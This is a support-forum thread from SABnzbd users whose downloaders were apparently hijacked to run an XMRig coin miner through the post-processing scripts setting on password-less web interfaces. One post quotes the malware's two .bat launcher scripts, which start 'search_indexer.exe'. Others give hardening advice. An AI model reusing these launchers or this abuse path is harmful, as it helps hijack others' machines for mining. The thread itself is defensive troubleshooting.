Page 1 of 1
nzbdwin_beta folder: Malware ... coin miner
Posted: April 11th, 2021, 7:45 am
by crispen8
Hi,
Yesterday I got a warning from Bitdefender referencing a program in the nzbdwin_beta folder which appeared in the SABnzbd complete folder.
Is this legit? Or a virus/trojan etc?
The folder gets recreated after I delete it.
I've googled it with no result, and Malwarebytes scan didn't detect any malware/spyware.
Sincerely,
Lowell
Re: nzbdwin_beta folder
Posted: April 11th, 2021, 8:12 am
by safihre
nzbdwin_beta is not something SABnzbd creates.
Or is this maybe the name of one of your folders in Config > Folders?
Re: nzbdwin_beta folder
Posted: April 11th, 2021, 2:27 pm
by crispen8
Was listed in the Config > Folders > Scripts field .
What is the default for this field?
I didn't change this.
Re: nzbdwin_beta folder
Posted: April 13th, 2021, 12:28 am
by safihre
No, it's not default. You can remove it.
Are you really really sure you didn't set that yourself?
Re: nzbdwin_beta folder
Posted: April 13th, 2021, 7:34 am
by imaxst
I noticed this folder the other day after my CPU usage hit 100%. It was running XMRIG miner. I'm not sure where it came from and I did not run any exe files I think it must have exploited a post processing script.
Re: nzbdwin_beta folder
Posted: April 13th, 2021, 7:38 am
by imaxst
From Reddit
So its a Crypto miner, it uses two cron.bat files to have SABNzbd open itself.
@echo off
cd /d %1
start "" "search_indexer.exe" & exit
@echo off
goto start:
########################################
### NZBGET POST-PROCESSING SCRIPT ###
:start
cd /d %NZBPP_DIRECTORY%
start search_indexer.exe
exit /b 93
Re: nzbdwin_beta folder
Posted: April 13th, 2021, 12:58 pm
by safihre
Is your Sabnzbd exposed to the internet without username and password?
Re: nzbdwin_beta folder: Malware ... coin miner
Posted: April 14th, 2021, 10:39 am
by imaxst
Not any longer
Re: nzbdwin_beta folder: Malware ... coin miner
Posted: April 14th, 2021, 2:12 pm
by sander
imaxst wrote: ↑April 14th, 2021, 10:39 am
Not any longer
Clever!
Re: nzbdwin_beta folder: Malware ... coin miner
Posted: April 14th, 2021, 2:16 pm
by sander
Oh, everybody: to avoid this in the future:
1) don't have your SAB-webgui unprotected open to Internet: at least put a password on it. Plus: put it on a less well known port, like 49231
2) in SABnzbd, at Unwanted Extensions, fill out EXE, COM, BAT
Re: nzbdwin_beta folder: Malware ... coin miner
Posted: April 14th, 2021, 3:39 pm
by starmanj
I'm getting this malware now.
Now that I'm infected, how do I stop the cron process that is repeatedly running? I added username and password so it stopped downloading the stuff...
Re: nzbdwin_beta folder: Malware ... coin miner
Posted: April 15th, 2021, 5:00 am
by sander
starmanj wrote: ↑April 14th, 2021, 3:39 pm
I'm getting this malware now.
Now that I'm infected, how do I stop the cron process that is repeatedly running? I added username and password so it stopped downloading the stuff...
cron process? That sounds Linux, but the malware is Windows (AFAIK) ... so can you explain?